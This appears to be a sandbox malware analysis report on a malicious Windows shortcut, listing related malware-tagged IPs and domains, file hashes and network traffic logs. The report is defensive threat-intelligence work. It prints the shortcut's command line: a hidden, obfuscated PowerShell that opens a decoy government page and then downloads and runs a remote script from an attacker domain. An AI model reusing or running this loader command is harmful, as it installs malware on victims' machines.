Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Snake Keylogger | Browse |
| ||
172.67.132.65 | Get hash | malicious | HTMLPhisher | Browse | ||
162.159.135.234 | Get hash | malicious | PureLog Stealer, zgRAT | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Discord Token Stealer | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Dicrord Rat | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
me-ycpi-cf-www.g06.yahoodns.net | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
gateway.discord.gg | Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Discord Rat | Browse |
| ||
Get hash | malicious | Discord Rat | Browse |
| ||
Get hash | malicious | Blank Grabber, DCRat, Discord Rat, PureLog Stealer, Xmrig, zgRAT | Browse |
| ||
Get hash | malicious | Discord Rat | Browse |
| ||
Get hash | malicious | Discord Rat | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CLOUDFLARENETUS | Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
CYBERNET-APCyberInternetServicesPvtLtdPK | Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Emotet | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | FormBook, PureLog Stealer | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
CLOUDFLARENETUS | Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | FormBook | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
28a2c9bd18a11de089ef85a160da29e4 | Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
3b5074b1b5d032e5620f69f9f700ff0e | Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| |
Get hash | malicious | PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | AsyncRAT, DcRat | Browse |
| ||
Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | XWorm, Xmrig | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
| ||
Get hash | malicious | ScreenConnect Tool | Browse |
|
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7354991854739628 |
Encrypted: | false |
SSDEEP: | 1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqC:2JIB/wUKUKQncEmYRTwh0y |
MD5: | 9CA6288E77BA0F0FB13CB864E30310A2 |
SHA1: | EB427A7B9F5EDF54384E904AE1B965C26A29EE94 |
SHA-256: | 17511B9D954AE2689DBAFC39F28E62E065C94F05F483BC1F9A28091413CCBF39 |
SHA-512: | 7BC4C24EDDF36DB2764FF2D29EE66B4C4E5671316C1A3E229463891FEE1713019AB3D3569C05DC4CB5CB8A8F61B085CAF2B86B586307AF005B05CF0326CF05C4 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1310720 |
Entropy (8bit): | 0.7900162886100845 |
Encrypted: | false |
SSDEEP: | 1536:7SB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:7azaPvgurTd42UgSii |
MD5: | DF0131116EEFCF97C90613331FD0E4A5 |
SHA1: | AFEA8FE6EE560A4F63F464DCC86D7B11EC55A2CA |
SHA-256: | CC484FE56935A4491CCDDC165ECB96A2DF1EE9E62795F7E6755A179D411D160B |
SHA-512: | 75E5D58ACC27F632F127F3B2A0137ACE1B244FF15CCA567277DDB3DDF429142ACC9898ED6C05B57F5EF21057DFCE96771E19FB446C65B71321F5BF08ED6D627D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08239311852983172 |
Encrypted: | false |
SSDEEP: | 3:NAlll/KYeLK+Xilqt/57Dek3JaHyUltallEqW3l/TjzzQ/t:NAl/KzLsAR3tq4md8/ |
MD5: | 8D5B95032E84FBE5D51522CC89E84652 |
SHA1: | 9F1DBF169071D594395250788627E6631918DEE2 |
SHA-256: | A4C5254E02E5CF0D9E647F37C0DB5D1D51C2A4D95BDD0421044B9EED61ADC3DB |
SHA-512: | 36AFC32CD31FD9D78C73DA233A09608B124E7BCC3AA875378A0BB5386E3BBA60C4C79855989DB84F47DB79B85CBFC06E56F60903D4FF4F59795B38A9D25DE1C9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 11608 |
Entropy (8bit): | 4.890472898059848 |
Encrypted: | false |
SSDEEP: | 192:6xoe5qpOZxoe54ib4ZVsm5emdR2Ca6pZlbjvwRjdHPRhAgkjDt4iWN3yBGHVQ9sQ:9rib4ZoopbjvwRjdvRNkjh4iUxsT6YpR |
MD5: | 6F4062C990C67D040ABC7B0F73689E66 |
SHA1: | 93421F047B440E9F62456C3E2EC1E6C842DA6A80 |
SHA-256: | 978EF65DE3DD792E7982FAAC8AC3C878936C94E2BCE7E17C56C604E5C68745F2 |
SHA-512: | 729AB7D57FB7D3405110D7F3C33F15057FE7DFB6DBDFFD5BD1D9F13C12C6448A70D0C39BC646F74B6A38E1708318CD4AE3D9DB1EF148815E80C30EB0122EEA57 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3092 |
Entropy (8bit): | 5.518768346219927 |
Encrypted: | false |
SSDEEP: | 96:pQeAzlHyIFKL2O9qrh7KCDpuTJ5Eo9AdrxQgP:pO1yt2jrACluTLL2NP |
MD5: | 30209A02326996800751223641F1E24E |
SHA1: | BAE59B4327826D9692513BBB1B724019AF8A64C5 |
SHA-256: | 1FF0BEDFD8CEC06E53CF7A7E0FF4B9B8CAA7771AF4DCB604E76257814C74D6B8 |
SHA-512: | 672FE9FA51EE76AB6D20289410706E5CBBB53CBC846ED5EFAC7B92F661F02FC2C10004B8533A45AAD6A484B2CD03290300B786767F31C98DDEAFBDB886B3B46D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1324 |
Entropy (8bit): | 5.401483527381133 |
Encrypted: | false |
SSDEEP: | 24:32SKco4KmM6GjKbmuuo+mN1s4RPQoUxqr9t7J0gt/NKCpnd+9N9rGTNk:GSU4Yymdo+ms4RIoUxqr9tK8NLpk9N9v |
MD5: | FD80B32BF823DE55A17B8220B80F6DCB |
SHA1: | 83B6EB55598CF0DA7FCE2B0C6878220FC38C6753 |
SHA-256: | 9676112403FD1F3B279F7BFF8265D4409604BD090065D6A8B9B61C0135629C35 |
SHA-512: | 7921B98A8B4CD0ED0D624D4708519718DC49164BD652E7FBFB9B908A59C0F262365D14A77CAF9D7D9F960F89482DED78AA1EDAF95591783D8B86E78443EFE588 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\87aaedf5acf4fa53.customDestinations-ms (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4604 |
Entropy (8bit): | 3.7970972150752185 |
Encrypted: | false |
SSDEEP: | 48:WHs4W5JYJlFlV+bTRl6eSogZo8JWJallV+bTRlJeSogZo8JWJO1:WplV+bTRWHDlV+bTR7HH |
MD5: | B582DB02B9B67A492AC10BF5CF1E2F6C |
SHA1: | D1E5EAD06D013C6EE248F2FAD7A661F743A09F69 |
SHA-256: | E2456ADD19232DB696EBA5189231FA5BD5573DA554B86E65590ACB6F65A2E4EF |
SHA-512: | EE7D818AE3E111E6AEC4E38AE9E917499132AF67460964C50C6A88981A539ECEB84B8F8A1C948164A2EF2C142FB050E2709BE7E2BE179CC84C17A109EAA0BBCF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q2JYBAOS0TXVRHO4L8V8.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4604 |
Entropy (8bit): | 3.7970972150752185 |
Encrypted: | false |
SSDEEP: | 48:WHs4W5JYJlFlV+bTRl6eSogZo8JWJallV+bTRlJeSogZo8JWJO1:WplV+bTRWHDlV+bTR7HH |
MD5: | B582DB02B9B67A492AC10BF5CF1E2F6C |
SHA1: | D1E5EAD06D013C6EE248F2FAD7A661F743A09F69 |
SHA-256: | E2456ADD19232DB696EBA5189231FA5BD5573DA554B86E65590ACB6F65A2E4EF |
SHA-512: | EE7D818AE3E111E6AEC4E38AE9E917499132AF67460964C50C6A88981A539ECEB84B8F8A1C948164A2EF2C142FB050E2709BE7E2BE179CC84C17A109EAA0BBCF |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 527 |
Entropy (8bit): | 4.801811297153848 |
Encrypted: | false |
SSDEEP: | 12:J0+ox0UDWsRGDW8hsw4Aox1WR3oKcpRmsXtmIrgvRMKiSQe9uE7F50v+T:yiUDWsYDWus/q3oKcpRTXt+vEHK50v+ |
MD5: | 91B69177B0962BD96D0259982F719C13 |
SHA1: | 2928B4AFCB66355CE9EAEEA22C3B0EEAB451F67A |
SHA-256: | AECC7333C5335AA7B28DA1BE8EC4FFB4F64688FE496E17906A7D815024B920B5 |
SHA-512: | B9215EC5B0AD38C32C05A0805A7AD38483756C5428B1B5033927109980A2A98725BBDB985ECE6BEDA6801305FE627FBFB6B14CA3C6C197FC6866A73A6BD95807 |
Malicious: | false |
URL: | https://pmo.gov.pk/favicon.ico |
Preview: |
Process: | C:\Program Files\Google\Chrome\Application\chrome.exe |
File Type: | |
Category: | downloaded |
Size (bytes): | 527 |
Entropy (8bit): | 4.801811297153848 |
Encrypted: | false |
SSDEEP: | 12:J0+ox0UDWsRGDW8hsw4Aox1WR3oKcpRmsXtmIrgvRMKiSQe9uE7F50v+T:yiUDWsYDWus/q3oKcpRTXt+vEHK50v+ |
MD5: | 91B69177B0962BD96D0259982F719C13 |
SHA1: | 2928B4AFCB66355CE9EAEEA22C3B0EEAB451F67A |
SHA-256: | AECC7333C5335AA7B28DA1BE8EC4FFB4F64688FE496E17906A7D815024B920B5 |
SHA-512: | B9215EC5B0AD38C32C05A0805A7AD38483756C5428B1B5033927109980A2A98725BBDB985ECE6BEDA6801305FE627FBFB6B14CA3C6C197FC6866A73A6BD95807 |
Malicious: | false |
URL: | https://pmo.gov.pk/site/404 |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 231 |
Entropy (8bit): | 5.273389443785072 |
Encrypted: | false |
SSDEEP: | 6:3P2XIpsTAWKCsu2xKvGCg1L3ppNaA3gYZzI/HLN1:f2XIpsT7KC2egd3pjZdZE/rr |
MD5: | 118DB1A61CD4AE2687BDDD46AC20E9D4 |
SHA1: | 8D5699C55E1E5D343B3A5E3CC7F822FB2F8E594E |
SHA-256: | 962BC1D758BBAA354CC24AB8238BB7CA328A80E16A850B95C3305C1839E48928 |
SHA-512: | 677EB0C35139D42A33DFDF2D45F405940399E4BE1E36922C827FA094341E3DC6B41FBCBFD7DD25CCEC582D5ADA7BCBDDBBBEC70013774C66A0EC13A24B038EB9 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.375620491491154 |
TrID: |
|
File name: | BX7yRz7XqF.lnk |
File size: | 2'033 bytes |
MD5: | b642cbf2d292b2e92d5038e6dfbd2de7 |
SHA1: | 4f92090113a65f13fa6ad128c7e492984a99d294 |
SHA256: | 7d1585f9ed317bf06a63bd5aaaf015f6066c51a7153370579b2836d66142f877 |
SHA512: | a2a92f80509e1148a69d8a546d3b7962a4a7a32093fe282c813482f0e58d8b66773df020af89b83510de49357ed6fc6e013ce9f25fa5bb24723aa5e7a1508b2f |
SSDEEP: | 48:8saJgIslLzKQX6RpyvKaRsaRBW3rat74:8fg5XKQwYy6JXGu7 |
TLSH: | C6418B1427F61708F2F38B3EA8B76211493F7809C975DBCE026C91440B67551E866F3B |
File Content Preview: | L..................F.... ....D7.t_..!.'$......A.t_...............................P.O. .:i.....+00.../C:\...................V.1......X.h..Windows.@........OwH.X.2...........................~..W.i.n.d.o.w.s.....Z.1......XR7..System32..B........OwH.X.2...... |
Icon Hash: | 74f4f4dcece9e9ed |
General | |
---|---|
Relative Path: | ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Command Line Argument: | -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/WinSysMgr/|Powershell |
Icon location: | %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 30, 2024 18:58:13.156486034 CEST | 49674 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:58:13.265799046 CEST | 49675 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:58:13.281461000 CEST | 49672 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:58:14.031404972 CEST | 49677 | 443 | 192.168.2.7 | 20.50.201.200 |
Sep 30, 2024 18:58:17.015873909 CEST | 49677 | 443 | 192.168.2.7 | 20.50.201.200 |
Sep 30, 2024 18:58:21.812675953 CEST | 49671 | 443 | 192.168.2.7 | 204.79.197.203 |
Sep 30, 2024 18:58:22.765790939 CEST | 49674 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:58:22.875155926 CEST | 49675 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:58:22.890784025 CEST | 49672 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:58:22.968899012 CEST | 49677 | 443 | 192.168.2.7 | 20.50.201.200 |
Sep 30, 2024 18:58:25.342677116 CEST | 443 | 49701 | 104.98.116.138 | 192.168.2.7 |
Sep 30, 2024 18:58:25.342797041 CEST | 49701 | 443 | 192.168.2.7 | 104.98.116.138 |
Sep 30, 2024 18:58:26.136106014 CEST | 49702 | 80 | 192.168.2.7 | 172.67.132.65 |
Sep 30, 2024 18:58:26.141036034 CEST | 80 | 49702 | 172.67.132.65 | 192.168.2.7 |
Sep 30, 2024 18:58:26.141155005 CEST | 49702 | 80 | 192.168.2.7 | 172.67.132.65 |
Sep 30, 2024 18:58:26.199614048 CEST | 49702 | 80 | 192.168.2.7 | 172.67.132.65 |
Sep 30, 2024 18:58:26.204420090 CEST | 80 | 49702 | 172.67.132.65 | 192.168.2.7 |
Sep 30, 2024 18:58:26.394411087 CEST | 49706 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:26.394460917 CEST | 443 | 49706 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:26.394524097 CEST | 49706 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:26.395026922 CEST | 49706 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:26.395042896 CEST | 443 | 49706 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:26.395452023 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:26.395551920 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:26.395622015 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:26.395839930 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:26.395891905 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:26.976491928 CEST | 80 | 49702 | 172.67.132.65 | 192.168.2.7 |
Sep 30, 2024 18:58:27.021898031 CEST | 49702 | 80 | 192.168.2.7 | 172.67.132.65 |
Sep 30, 2024 18:58:27.582215071 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.583395004 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.583431959 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.584062099 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.584125042 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.584785938 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.584862947 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.585936069 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.586023092 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.586066961 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.627417088 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.640856981 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.640888929 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.741928101 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.988801003 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.988887072 CEST | 443 | 49707 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.988931894 CEST | 49707 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.989243984 CEST | 443 | 49706 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.990540981 CEST | 49706 | 443 | 192.168.2.7 | 203.101.184.118 |
Sep 30, 2024 18:58:27.990554094 CEST | 443 | 49706 | 203.101.184.118 | 192.168.2.7 |
Sep 30, 2024 18:58:27.991038084 CEST | 443 | 49706 | 203.101.184.118 | 192.168.2.7 |
